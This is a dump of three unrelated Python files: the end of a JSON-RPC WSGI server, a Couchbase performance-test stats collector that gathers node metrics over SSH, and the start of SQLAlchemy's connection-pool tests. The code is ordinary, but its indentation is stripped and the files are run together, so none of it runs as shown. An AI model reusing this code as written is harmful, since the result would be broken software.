# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {
'': application
}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user, _, _ = application.auth_client.validate_token(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception, e:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if len(sys.argv) >= 3 and len(sys.argv) <= 4 and os.path.isfile(sys.argv[1]):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
stats.py
|
import json
import re
from threading import Thread
import time
import gzip
from collections import defaultdict
import logging
import logging.config
from uuid import uuid4
from itertools import cycle
from lib.membase.api.exception import SetViewInfoNotFound, ServerUnavailableException
from lib.membase.api.rest_client import RestConnection
from lib.memcached.helper.data_helper import MemcachedClientHelper, VBucketAwareMemcached
from lib.remote.remote_util import RemoteMachineShellConnection, RemoteMachineHelper
RETRIES = 10
logging.config.fileConfig('mcsoda.logging.conf')
logging.getLogger("paramiko").setLevel(logging.WARNING)
log = logging.getLogger()
hex = lambda: uuid4().hex
def histo_percentile(histo, percentiles):
"""The histo dict is returned by add_timing_sample(). The percentiles must
be sorted, ascending, like [0.90, 0.99]."""
v_sum = 0
bins = histo.keys()
bins.sort()
for bin in bins:
v_sum += histo[bin]
v_sum = float(v_sum)
v_cur = 0 # Running total.
rv = []
for bin in bins:
if not percentiles:
return rv
v_cur += histo[bin]
while percentiles and (v_cur / v_sum) >= percentiles[0]:
rv.append((percentiles[0], bin))
percentiles.pop(0)
return rv
class StatsCollector(object):
_task = {}
_verbosity = True
_mb_stats = {"snapshots": []} # manually captured memcached stats
_reb_stats = {}
_lat_avg_stats = {} # aggregated top level latency stats
_xdcr_stats = {}
def __init__(self, verbosity):
self._verbosity = verbosity
self.is_leader = False
self.active_mergers = 0
def start(self, nodes, bucket, pnames, name, client_id='',
collect_server_stats=True, ddoc=None, clusters=None):
"""This function starts collecting stats from all nodes with the given
interval"""
self._task = {"state": "running", "threads": [], "name": name,
"time": time.time(), "ops": [], "totalops": [],
"ops-temp": [], "latency": {}, "data_size_stats": []}
rest = RestConnection(nodes[0])
info = rest.get_nodes_self()
self.data_path = info.storage[0].get_data_path()
self.client_id = str(client_id)
self.nodes = nodes
self.bucket = bucket
if collect_server_stats:
self._task["threads"].append(
Thread(target=self.membase_stats, name="membase")
)
self._task["threads"].append(
Thread(target=self.system_stats, name="system", args=(pnames, ))
)
self._task["threads"].append(
Thread(target=self.iostats, name="iostats")
)
self._task["threads"].append(
Thread(target=self.ns_server_stats, name="ns_server")
)
self._task["threads"].append(
Thread(target=self.get_bucket_size, name="bucket_size")
)
self._task["threads"].append(
Thread(target=self.rebalance_progress, name="rebalance_progress")
)
if ddoc is not None:
self._task["threads"].append(
Thread(target=self.indexing_time_stats, name="index_time", args=(ddoc, ))
)
self._task["threads"].append(
Thread(target=self.indexing_throughput_stats, name="index_thr")
)
if clusters:
self.clusters = clusters
self._task["threads"].append(
Thread(target=self.xdcr_lag_stats, name="xdcr_lag_stats")
)
for thread in self._task["threads"]:
thread.daemon = True
thread.start()
# Getting build/machine stats from only one node in the cluster
self.build_stats(nodes)
self.machine_stats(nodes)
# Start atop
self.start_atop()
def stop(self):
self.stop_atop()
self._task["state"] = "stopped"
for t in self._task["threads"]:
t.join(120)
if t.is_alive():
log.error("failed to join {0} thread".format(t.name))
self._task["time"] = time.time() - self._task["time"]
def sample(self, cur):
pass
def get_ns_servers_samples(self, metric):
for subset in self._task["ns_server_data"]:
samples = subset["op"]["samples"][metric]
yield float(sum(samples)) / len(samples)
def calc_xperf_stats(self):
metrics = ("replication_changes_left", "xdc_ops")
for metric in metrics:
self._xdcr_stats["avg_" + metric] = \
sum(self.get_ns_servers_samples(metric)) /\
sum(1 for _ in self.get_ns_servers_samples(metric))
def export(self, name, test_params):
for latency in self._task["latency"].keys():
# save the last histogram snapshot
per_90th_tot = 0
histos = self._task["latency"].get(latency, [])
if histos:
key = latency + "-histogram"
self._task["latency"][key] = histos[-1].copy()
del self._task["latency"][key]["delta"]
self._task["latency"][key]["client_id"] = self.client_id
# calculate percentiles
key = 'percentile-' + latency
self._task["latency"][key] = []
for histo in histos:
# for every sample histogram, produce a temp summary:
# temp = [90 per, 95 per, 99 per, client_id, delta]
temp = []
time = histo['time']
delta = histo['delta']
del histo['delta'], histo['time']
p = histo_percentile(histo, [0.80, 0.90, 0.95, 0.99, 0.999])
# p is list of tuples
for val in p:
temp.append(val[-1])
per_90th_tot += temp[1]
temp.append(self.client_id)
temp.append(time)
temp.append(delta)
self._task["latency"][key].append(temp)
if per_90th_tot:
self._lat_avg_stats["%s-90th-avg" % latency] \
= per_90th_tot / len(histos) * 1000000
# XDCR stats
try:
self.calc_xperf_stats()
except KeyError:
pass
test_params.update(self._xdcr_stats)
test_params.update(self._reb_stats)
test_params.update(self._lat_avg_stats)
obj = {
"buildinfo": self._task.get("buildstats", {}),
"machineinfo": self._task.get("machinestats", {}),
"membasestats": self._task.get("membasestats", []),
"systemstats": self._task.get("systemstats", []),
"iostats": self._task.get("iostats", []),
"name": name,
"totalops": self._task["totalops"],
"ops": self._task["ops"],
"time": self._task["time"],
"info": test_params,
"ns_server_data": self._task.get("ns_server_stats", []),
"ns_server_data_system": self._task.get("ns_server_stats_system", []),
"view_info": self._task.get("view_info", []),
"indexer_info": self._task.get("indexer_info", []),
"xdcr_lag": self._task.get("xdcr_lag", []),
"rebalance_progress": self._task.get("rebalance_progress", []),
"timings": self._task.get("timings", []),
"dispatcher": self._task.get("dispatcher", []),
"bucket-size": self._task.get("bucket_size", []),
"data-size": self._task.get("data_size_stats", []),
"latency-set-histogram": self._task["latency"].get("latency-set-histogram", []),
"latency-set": self._task["latency"].get('percentile-latency-set', []),
"latency-set-recent": self._task["latency"].get('percentile-latency-set-recent', []),
"latency-get-histogram": self._task["latency"].get("latency-get-histogram", []),
"latency-get": self._task["latency"].get('percentile-latency-get', []),
"latency-get-recent": self._task["latency"].get('percentile-latency-get-recent', []),
"latency-delete": self._task["latency"].get('percentile-latency-delete', []),
"latency-delete-recent": self._task["latency"].get('percentile-latency-delete-recent', []),
"latency-query-histogram": self._task["latency"].get("latency-query-histogram", []),
"latency-query": self._task["latency"].get('percentile-latency-query', []),
"latency-query-recent": self._task["latency"].get('percentile-latency-query-recent', []),
"latency-obs-persist-server-histogram": self._task["latency"].get("latency-obs-persist-server-histogram", []),
"latency-obs-persist-server": self._task["latency"].get('percentile-latency-obs-persist-server-server', []),
"latency-obs-persist-server-recent": self._task["latency"].get('percentile-latency-obs-persist-server-recent', []),
"latency-obs-persist-client-histogram": self._task["latency"].get("latency-obs-persist-client-histogram", []),
"latency-obs-persist-client": self._task["latency"].get('percentile-latency-obs-persist-client', []),
"latency-obs-persist-client-recent": self._task["latency"].get('percentile-latency-obs-persist-client-recent', []),
"latency-obs-repl-client-histogram": self._task["latency"].get("latency-obs-repl-client-histogram", []),
"latency-obs-repl-client": self._task["latency"].get('percentile-latency-obs-repl-client', []),
"latency-obs-repl-client-recent": self._task["latency"].get('percentile-latency-obs-repl-client-recent', []),
"latency-woq-obs-histogram": self._task["latency"].get("latency-woq-obs-histogram", []),
"latency-woq-obs": self._task["latency"].get('percentile-latency-woq-obs', []),
"latency-woq-obs-recent": self._task["latency"].get('percentile-latency-woq-obs-recent', []),
"latency-woq-query-histogram": self._task["latency"].get("latency-woq-query-histogram", []),
"latency-woq-query": self._task["latency"].get('percentile-latency-woq-query', []),
"latency-woq-query-recent": self._task["latency"].get('percentile-latency-woq-query-recent', []),
"latency-woq-histogram": self._task["latency"].get("latency-woq-histogram", []),
"latency-woq": self._task["latency"].get('percentile-latency-woq', []),
"latency-woq-recent": self._task["latency"].get('percentile-latency-woq-recent', []),
"latency-cor-histogram": self._task["latency"].get("latency-cor-histogram", []),
"latency-cor": self._task["latency"].get('percentile-latency-cor', []),
"latency-cor-recent": self._task["latency"].get('percentile-latency-cor-recent', [])}
if self.client_id:
patterns = ('reload$', 'load$', 'warmup$', 'index$')
phases = ('.reload', '.load', '.warmup', '.index')
name_picker = lambda (pattern, phase): re.search(pattern, self._task["name"])
try:
phase = filter(name_picker, zip(patterns, phases))[0][1]
except IndexError:
phase = '.loop'
name = str(self.client_id) + phase
file = gzip.open("{0}.json.gz".format(name), 'wb')
file.write(json.dumps(obj))
file.close()
def get_bucket_size(self, interval=60):
self._task["bucket_size"] = []
retries = 0
nodes_iterator = (node for node in self.nodes)
node = nodes_iterator.next()
rest = RestConnection(node)
while not self._aborted():
time.sleep(interval)
log.info("collecting bucket size stats")
try:
status, db_size = rest.get_database_disk_size(self.bucket)
if status:
self._task["bucket_size"].append(db_size)
except IndexError, e:
retries += 1
log.error("unable to get bucket size {0}: {1}"
.format(self.bucket, e))
log.warning("retries: {0} of {1}".format(retries, RETRIES))
if retries == RETRIES:
try:
node = nodes_iterator.next()
rest = RestConnection(node)
retries = 0
except StopIteration:
log.error("no nodes available: stop collecting bucket_size")
return
log.info("finished bucket size stats")
def get_data_file_size(self, nodes, interval, bucket):
shells = []
for node in nodes:
try:
shells.append(RemoteMachineShellConnection(node))
except Exception as error:
log.error(error)
paths = []
if shells[0].is_couchbase_installed():
bucket_path = self.data_path + '/{0}'.format(bucket)
paths.append(bucket_path)
view_path = bucket_path + '/set_view_{0}_design'.format(bucket)
paths.append(view_path)
else:
paths.append(self.data_path + '/{0}-data'.format(bucket))
d = {"snapshots": []}
start_time = str(self._task["time"])
while not self._aborted():
time.sleep(interval)
current_time = time.time()
i = 0
for shell in shells:
node = nodes[i]
unique_id = node.ip + '-' + start_time
value = {}
for path in paths:
size = shell.get_data_file_size(path)
value["file"] = path.split('/')[-1]
value["size"] = size
value["unique_id"] = unique_id
value["time"] = current_time
value["ip"] = node.ip
d["snapshots"].append(value.copy())
i += 1
self._task["data_size_stats"] = d["snapshots"]
log.info("finished data_size_stats")
#ops stats
#{'tot-sets': 899999, 'tot-gets': 1, 'tot-items': 899999, 'tot-creates': 899999}
def ops_stats(self, ops_stat):
ops_stat["time"] = time.time()
self._task["ops-temp"].append(ops_stat)
if len(self._task["ops-temp"]) >= 500 * (1 + self.active_mergers):
# Prevent concurrent merge
while self.active_mergers:
time.sleep(0.1)
# Semaphore: +1 active
self.active_mergers += 1
# Merge
merged = self._merge()
self._task["ops"].append(merged)
self._task["ops-temp"] = self._task["ops-temp"][500:]
# Semaphore: -1 active
self.active_mergers -= 1
#if self._task["ops"] has more than 1000 elements try to aggregate them ?
def latency_stats(self, latency_cmd, latency_stat, cur_time=0):
if self._task["latency"].get(latency_cmd) is None:
self._task["latency"][latency_cmd] = []
temp_latency_stat = latency_stat.copy()
if not cur_time:
cur_time = time.time()
temp_latency_stat['time'] = int(cur_time)
temp_latency_stat['delta'] = cur_time - self._task['time']
self._task["latency"][latency_cmd].append(temp_latency_stat)
def _merge(self):
first = self._task["ops-temp"][0]
merged = {"startTime": first["start-time"]}
totalgets = 0
totalsets = 0
totalqueries = 0
delta = 0
for i in range(499):
current = self._task["ops-temp"][i]
next = self._task["ops-temp"][i + 1]
totalgets += current["tot-gets"]
totalsets += current["tot-sets"]
totalqueries += current["tot-queries"]
delta += (next["start-time"] - current["start-time"])
merged["endTime"] = merged["startTime"] + delta
merged["totalSets"] = totalsets
merged["totalGets"] = totalgets
merged["totalQueries"] = totalqueries
qps = totalqueries / float(delta)
merged["queriesPerSec"] = qps
return merged
def total_stats(self, ops_stat):
ops_stat["time"] = time.time()
self._task["totalops"].append(ops_stat)
def build_stats(self, nodes):
json_response = StatUtil.build_info(nodes[0])
self._task["buildstats"] = json_response
def machine_stats(self, nodes):
machine_stats = StatUtil.machine_info(nodes[0])
self._task["machinestats"] = machine_stats
def reb_stats(self, start, dur):
log.info("recording reb start = {0}, reb duration = {1}".format(start, dur))
self._reb_stats["reb_start"] = start
self._reb_stats["reb_dur"] = dur
def _extract_proc_info(self, shell, pid):
output, error = shell.execute_command("cat /proc/{0}/stat".format(pid))
fields = (
'pid', 'comm', 'state', 'ppid', 'pgrp', 'session', 'tty_nr',
'tpgid', 'flags', 'minflt', 'cminflt', 'majflt', 'cmajflt',
'utime', 'stime', 'cutime', 'cstime', 'priority ' 'nice',
'num_threads', 'itrealvalue', 'starttime', 'vsize', 'rss',
'rsslim', 'startcode', 'endcode', 'startstack', 'kstkesp',
'kstkeip', 'signal', 'blocked ', 'sigignore', 'sigcatch', 'wchan',
'nswap', 'cnswap', 'exit_signal', 'processor', 'rt_priority',
'policy', 'delayacct_blkio_ticks', 'guest_time', 'cguest_time')
return {} if error else dict(zip(fields, output[0].split(' ')))
def _extract_io_info(self, shell):
"""
Extract info from iostat
Output:
[kB_read, kB_wrtn, %util, %iowait, %idle]
Rough Benchmarks:
My local box (WIFI LAN - VM), took ~1.2 sec for this routine
"""
CMD = "iostat -dk | grep 'sd. ' | " \
"awk '{read+=$5; write+=$6} END { print read, write }'"
out, err = shell.execute_command(CMD)
results = out[0]
CMD = "iostat -dkx | grep 'sd. ' | "\
"awk '{util+=$12} END { print util/NR }'"
out, err = shell.execute_command(CMD)
results = "%s %s" % (results, out[0])
CMD = "iostat 1 2 -c | awk 'NR == 7 { print $4, $6 }'"
out, err = shell.execute_command(CMD)
results = "%s %s" % (results, out[0])
return results.split(' ')
def system_stats(self, pnames, interval=10):
shells = []
for node in self.nodes:
try:
shells.append(RemoteMachineShellConnection(node))
except Exception, error:
log.error(error)
d = {"snapshots": []}
# "pname":"x","pid":"y","snapshots":[{"time":time,"value":value}]
start_time = str(self._task["time"])
while not self._aborted():
time.sleep(interval)
current_time = time.time()
i = 0
for shell in shells:
node = self.nodes[i]
unique_id = node.ip + '-' + start_time
for pname in pnames:
obj = RemoteMachineHelper(shell).is_process_running(pname)
if obj and obj.pid:
value = self._extract_proc_info(shell, obj.pid)
value["name"] = pname
value["id"] = obj.pid
value["unique_id"] = unique_id
value["time"] = current_time
value["ip"] = node.ip
d["snapshots"].append(value)
i += 1
self._task["systemstats"] = d["snapshots"]
log.info("finished system_stats")
def iostats(self, interval=10):
shells = []
for node in self.nodes:
try:
shells.append(RemoteMachineShellConnection(node))
except Exception, error:
log.error(error)
self._task["iostats"] = []
log.info("started capturing io stats")
while not self._aborted():
time.sleep(interval)
log.info("collecting io stats")
for shell in shells:
try:
kB_read, kB_wrtn, util, iowait, idle = \
self._extract_io_info(shell)
except (ValueError, TypeError, IndexError):
continue
if kB_read and kB_wrtn:
self._task["iostats"].append({"time": time.time(),
"ip": shell.ip,
"read": kB_read,
"write": kB_wrtn,
"util": util,
"iowait": iowait,
"idle": idle})
log.info("finished capturing io stats")
def capture_mb_snapshot(self, node):
"""Capture membase stats snapshot manually"""
log.info("capturing memcache stats snapshot for {0}".format(node.ip))
stats = {}
try:
bucket = RestConnection(node).get_buckets()[0].name
mc = MemcachedClientHelper.direct_client(node, bucket)
stats = mc.stats()
stats.update(mc.stats("warmup"))
except Exception, e:
log.error(e)
return False
finally:
stats["time"] = time.time()
stats["ip"] = node.ip
self._mb_stats["snapshots"].append(stats)
print stats
log.info("memcache stats snapshot captured")
return True
def membase_stats(self, interval=60):
mcs = []
for node in self.nodes:
try:
bucket = RestConnection(node).get_buckets()[0].name
mc = MemcachedClientHelper.direct_client(node, bucket)
mcs.append(mc)
except Exception, error:
log.error(error)
self._task["membasestats"] = []
self._task["timings"] = []
self._task["dispatcher"] = []
data = dict()
for mc in mcs:
data[mc.host] = {"snapshots": [], "timings": [], "dispatcher": []}
while not self._aborted():
time.sleep(interval)
log.info("collecting membase stats")
for mc in mcs:
for rerty in xrange(RETRIES):
try:
stats = mc.stats()
except Exception as e:
log.warn("{0}, retries = {1}".format(str(e), rerty))
time.sleep(2)
mc.reconnect()
else:
break
else:
stats = {}
data[mc.host]["snapshots"].append(stats)
for arg in ("timings", "dispatcher"):
try:
stats = mc.stats(arg)
data[mc.host][arg].append(stats)
except EOFError, e:
log.error("unable to get {0} stats {1}: {2}"
.format(arg, mc.host, e))
for host in (mc.host for mc in mcs):
unique_id = host + '-' + str(self._task["time"])
current_time = time.time()
if self._mb_stats["snapshots"]: # use manually captured stats
self._task["membasestats"] = self._mb_stats["snapshots"]
else: # use periodically captured stats
for snapshot in data[host]["snapshots"]:
snapshot["unique_id"] = unique_id
snapshot["time"] = current_time
snapshot["ip"] = host
self._task["membasestats"].append(snapshot)
for timing in data[host]["timings"]:
timing["unique_id"] = unique_id
timing["time"] = current_time
timing["ip"] = host
self._task["timings"].append(timing)
for dispatcher in data[host]["dispatcher"]:
dispatcher["unique_id"] = unique_id
dispatcher["time"] = current_time
dispatcher["ip"] = host
self._task["dispatcher"].append(dispatcher)
if data[host]["timings"]:
log.info("dumping disk timing stats: {0}".format(host))
latests_timings = data[host]["timings"][-1]
for key, value in sorted(latests_timings.iteritems()):
if key.startswith("disk"):
print "{0:50s}: {1}".format(key, value)
log.info("finished membase_stats")
def ns_server_stats(self, interval=60):
self._task["ns_server_stats"] = []
self._task["ns_server_stats_system"] = []
nodes_iterator = (node for node in self.nodes)
node = nodes_iterator.next()
retries = 0
not_null = lambda v: v if v is not None else 0
rest = RestConnection(node)
while not self._aborted():
time.sleep(interval)
log.info("collecting ns_server_stats")
try:
# Bucket stats
ns_server_stats = rest.fetch_bucket_stats(bucket=self.bucket)
for key, value in ns_server_stats["op"]["samples"].iteritems():
ns_server_stats["op"]["samples"][key] = not_null(value)
self._task["ns_server_stats"].append(ns_server_stats)
# System stats
ns_server_stats_system = rest.fetch_system_stats()
self._task["ns_server_stats_system"].append(ns_server_stats_system)
except ServerUnavailableException, e:
log.error(e)
except (ValueError, TypeError), e:
log.error("unable to parse json object {0}: {1}".format(node, e))
else:
continue
retries += 1
if retries <= RETRIES:
log.warning("retries: {0} of {1}".format(retries, RETRIES))
else:
try:
node = nodes_iterator.next()
rest = RestConnection(node)
retries = 0
except StopIteration:
log.error("no nodes available: stop collecting ns_server_stats")
return
log.info("finished ns_server_stats")
def indexing_time_stats(self, ddoc, interval=60):
"""Collect view indexing stats"""
self._task['view_info'] = list()
rests = [RestConnection(node) for node in self.nodes]
while not self._aborted():
time.sleep(interval)
log.info("collecting view indexing stats")
for rest in rests:
try:
data = rest.set_view_info(self.bucket, ddoc)
except (SetViewInfoNotFound, ServerUnavailableException), error:
log.error(error)
continue
try:
update_history = data[1]['stats']['update_history']
indexing_time = \
[event['indexing_time'] for event in update_history]
avg_time = sum(indexing_time) / len(indexing_time)
except (IndexError, KeyError, ValueError):
avg_time = 0
finally:
self._task['view_info'].append({'node': rest.ip,
'indexing_time': avg_time,
'timestamp': time.time()})
log.info("finished collecting view indexing stats")
def indexing_throughput_stats(self, interval=15):
self._task['indexer_info'] = list()
indexers = defaultdict(dict)
rests = [RestConnection(node) for node in self.nodes]
while not self._aborted():
time.sleep(interval) # 15 seconds by default
# Grab indexer tasks from all nodes
tasks = list()
for rest in rests:
try:
active_tasks = rest.active_tasks()
except ServerUnavailableException, error:
log.error(error)
continue
indexer_tasks = filter(lambda t: t['type'] == 'indexer',
active_tasks)
tasks.extend(indexer_tasks)
# Calculate throughput for every unique PID
thr = 0
for task in tasks:
uiid = task['pid'] + str(task['started_on'])
changes_delta = \
task['changes_done'] - indexers[uiid].get('changes_done', 0)
time_delta = \
task['updated_on'] - indexers[uiid].get('updated_on',
task['started_on'])
if time_delta:
thr += changes_delta / time_delta
indexers[uiid]['changes_done'] = task['changes_done']
indexers[uiid]['updated_on'] = task['updated_on']
# Average throughput
self._task['indexer_info'].append({
'indexing_throughput': thr,
'timestamp': time.time()
})
def _get_xdcr_latency(self, src_client, dst_client, multi=False):
PREFIX = "xdcr_track_"
kvs = dict((PREFIX + hex(), hex()) for _ in xrange(10))
key = PREFIX + hex()
persisted = False
t0 = t1 = time.time()
if multi:
src_client.setMulti(0, 0, kvs)
while True:
try:
dst_client.getMulti(kvs.keys(), timeout_sec=120,
parallel=False)
break
except ValueError:
time.sleep(0.05)
else:
src_client.set(key, 0, 0, key)
while not persisted:
_, _, _, persisted, _ = src_client.observe(key)
t1 = time.time()
while time.time() - t1 < 300: # 5 minutes timeout
try:
dst_client.get(key)
break
except:
time.sleep(0.05)
total_time = (time.time() - t0) * 1000
persist_time = (t1 - t0) * 1000
if multi:
return {"multi_100_xdcr_lag": total_time}
else:
return {
"xdcr_lag": total_time,
"xdcr_persist_time": persist_time,
"xdcr_diff": total_time - persist_time,
"timestamp": time.time()
}
def xdcr_lag_stats(self, interval=5):
master = self.clusters[0][0]
slave = self.clusters[1][0]
src_client = VBucketAwareMemcached(RestConnection(master), self.bucket)
dst_client = VBucketAwareMemcached(RestConnection(slave), self.bucket)
log.info("started xdcr lag measurements")
self._task["xdcr_lag"] = list()
while not self._aborted():
single_stats = self._get_xdcr_latency(src_client, dst_client)
multi_stats = self._get_xdcr_latency(src_client, dst_client, True)
multi_stats.update(single_stats)
self._task['xdcr_lag'].append(multi_stats)
time.sleep(interval)
filename = time.strftime("%Y%m%d_%H%M%S_xdcr_lag.json",
time.localtime())
with open(filename, "w") as fh:
fh.write(json.dumps(self._task['xdcr_lag'],
indent=4, sort_keys=True))
log.info("finished xdcr lag measurements")
def rebalance_progress(self, interval=15):
self._task["rebalance_progress"] = list()
nodes = cycle(self.nodes)
rest = RestConnection(nodes.next())
while not self._aborted():
try:
tasks = rest.ns_server_tasks()
except ServerUnavailableException, error:
log.error(error)
rest = RestConnection(nodes.next())
continue
for task in tasks:
if task["type"] == "rebalance":
self._task["rebalance_progress"].append({
"rebalance_progress": task.get("progress", 0),
"timestamp": time.time()
})
break
time.sleep(interval)
log.info("finished active_tasks measurements")
def _aborted(self):
return self._task["state"] == "stopped"
def start_atop(self):
"""Start atop collector"""
for node in self.nodes:
try:
shell = RemoteMachineShellConnection(node)
except SystemExit:
log.error("can't establish SSH session with {0}".format(node.ip))
else:
cmd = "killall atop; rm -fr /tmp/*.atop;" + \
"atop -w /tmp/{0}.atop -a 15".format(node.ip) + \
" > /dev/null 2> /dev.null < /dev/null &"
shell.execute_command(cmd)
def stop_atop(self):
"""Stop atop collector"""
for node in self.nodes:
try:
shell = RemoteMachineShellConnection(node)
except SystemExit:
log.error("can't establish SSH session with {0}".format(node.ip))
else:
shell.execute_command("killall atop")
class CallbackStatsCollector(StatsCollector):
"""Invokes optional callback when registered levels have been reached
during stats sample()'ing."""
def __init__(self, verbosity):
# Tuples of level_name, level, callback.
self.level_callbacks = []
super(CallbackStatsCollector, self).__init__(verbosity)
def sample(self, cur):
for level_name, level, callback in self.level_callbacks:
if level < cur.get(level_name, -1):
callback(cur)
return super(CallbackStatsCollector, self).sample(cur)
class StatUtil(object):
@staticmethod
def build_info(node):
rest = RestConnection(node)
api = rest.baseUrl + 'nodes/self'
status, content, header = rest._http_request(api)
json_parsed = json.loads(content)
return json_parsed
@staticmethod
def machine_info(node):
shell = RemoteMachineShellConnection(node)
info = shell.extract_remote_info()
return {"type": info.type, "distribution": info.distribution_type,
"version": info.distribution_version, "ram": info.ram,
"cpu": info.cpu, "disk": info.disk, "hostname": info.hostname}
|
test_pool.py
|
import collections
import random
import threading
import time
import weakref
import sqlalchemy as tsa
from sqlalchemy import event
from sqlalchemy import pool
from sqlalchemy import select
from sqlalchemy import testing
from sqlalchemy.engine import default
from sqlalchemy.pool.impl import _AsyncConnDialect
from sqlalchemy.testing import assert_raises
from sqlalchemy.testing import assert_raises_context_ok
from sqlalchemy.testing import assert_raises_message
from sqlalchemy.testing import eq_
from sqlalchemy.testing import expect_raises
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import is_
from sqlalchemy.testing import is_none
from sqlalchemy.testing import is_not
from sqlalchemy.testing import is_not_none
from sqlalchemy.testing import is_true
from sqlalchemy.testing import mock
from sqlalchemy.testing.engines import testing_engine
from sqlalchemy.testing.mock import ANY
from sqlalchemy.testing.mock import call
from sqlalchemy.testing.mock import Mock
from sqlalchemy.testing.mock import patch
from sqlalchemy.testing.util import gc_collect
from sqlalchemy.testing.util import lazy_gc
join_timeout = 10
def MockDBAPI(): # noqa
def cursor():
return Mock()
def connect(*arg, **kw):
def close():
conn.closed = True
# mock seems like it might have an issue logging
# call_count correctly under threading, not sure.
# adding a side_effect for close seems to help.
conn = Mock(
cursor=Mock(side_effect=cursor),
close=Mock(side_effect=close),
closed=False,
)
return conn
def shutdown(value):
if value:
db.connect = Mock(side_effect=Exception("connect failed"))
else:
db.connect = Mock(side_effect=connect)
db.is_shutdown = value
db = Mock(
connect=Mock(side_effect=connect), shutdown=shutdown, is_shutdown=False
)
return db
class PoolTestBase(fixtures.TestBase):
def setup_test(self):
pool.clear_managers()
self._teardown_conns = []
def teardown_test(self):
for ref in self._teardown_conns:
conn = ref()
if conn:
conn.close()
@classmethod
def teardown_test_class(cls):
pool.clear_managers()
def _with_teardown(self, connection):
self._teardown_conns.append(weakref.ref(connection))
return connection
def _queuepool_fixture(self, **kw):
dbapi, pool = self._queuepool_dbapi_fixture(**kw)
return pool
def _queuepool_dbapi_fixture(self, **kw):
dbapi = MockDBAPI()
_is_asyncio = kw.pop("_is_asyncio", False)
p = pool.QueuePool(creator=lambda: dbapi.connect("foo.db"), **kw)
if _is_asyncio:
p._is_asyncio = True
p._dialect = _AsyncConnDialect()
return dbapi, p
class PoolTest(PoolTestBase):
@testing.fails_on(
"+pyodbc", "pyodbc cursor doesn't implement tuple __eq__"
)
@testing.fails_on("+pg8000", "returns [1], not (1,)")
def test_cursor_iterable(self):
conn = testing.db.raw_connection()
cursor = conn.cursor()
cursor.execute(str(select(1).compile(testing.db)))
expected = [(1,)]
for row in cursor:
eq_(row, expected.pop(0))
def test_no_connect_on_recreate(self):
def creator():
raise Exception("no creates allowed")
for cls in (
pool.SingletonThreadPool,
pool.StaticPool,
pool.QueuePool,
pool.NullPool,
pool.AssertionPool,
):
p = cls(creator=creator)
p.dispose()
p2 = p.recreate()
assert p2.__class__ is cls
mock_dbapi = MockDBAPI()
p = cls(creator=mock_dbapi.connect)
conn = p.connect()
conn.close()
mock_dbapi.connect.side_effect = Exception("error!")
p.dispose()
p.recreate()
def test_info(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c = p.connect()
self.assert_(not c.info)
self.assert_(c.info is c._connection_record.info)
c.info["foo"] = "bar"
c.close()
del c
c = p.connect()
self.assert_("foo" in c.info)
c.invalidate()
c = p.connect()
self.assert_("foo" not in c.info)
c.info["foo2"] = "bar2"
c.detach()
self.assert_("foo2" in c.info)
c2 = p.connect()
is_not(c.connection, c2.connection)
assert not c2.info
assert "foo2" in c.info
def test_rec_info(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c = p.connect()
self.assert_(not c.record_info)
self.assert_(c.record_info is c._connection_record.record_info)
c.record_info["foo"] = "bar"
c.close()
del c
c = p.connect()
self.assert_("foo" in c.record_info)
c.invalidate()
c = p.connect()
self.assert_("foo" in c.record_info)
c.record_info["foo2"] = "bar2"
c.detach()
is_(c.record_info, None)
is_(c._connection_record, None)
c2 = p.connect()
assert c2.record_info
assert "foo2" in c2.record_info
def test_rec_unconnected(self):
# test production of a _ConnectionRecord with an
# initially unconnected state.
dbapi = MockDBAPI()
p1 = pool.Pool(creator=lambda: dbapi.connect("foo.db"))
r1 = pool._ConnectionRecord(p1, connect=False)
assert not r1.connection
c1 = r1.get_connection()
is_(c1, r1.connection)
def test_rec_close_reopen(self):
# test that _ConnectionRecord.close() allows
# the record to be reusable
dbapi = MockDBAPI()
p1 = pool.Pool(creator=lambda: dbapi.connect("foo.db"))
r1 = pool._ConnectionRecord(p1)
c1 = r1.connection
c2 = r1.get_connection()
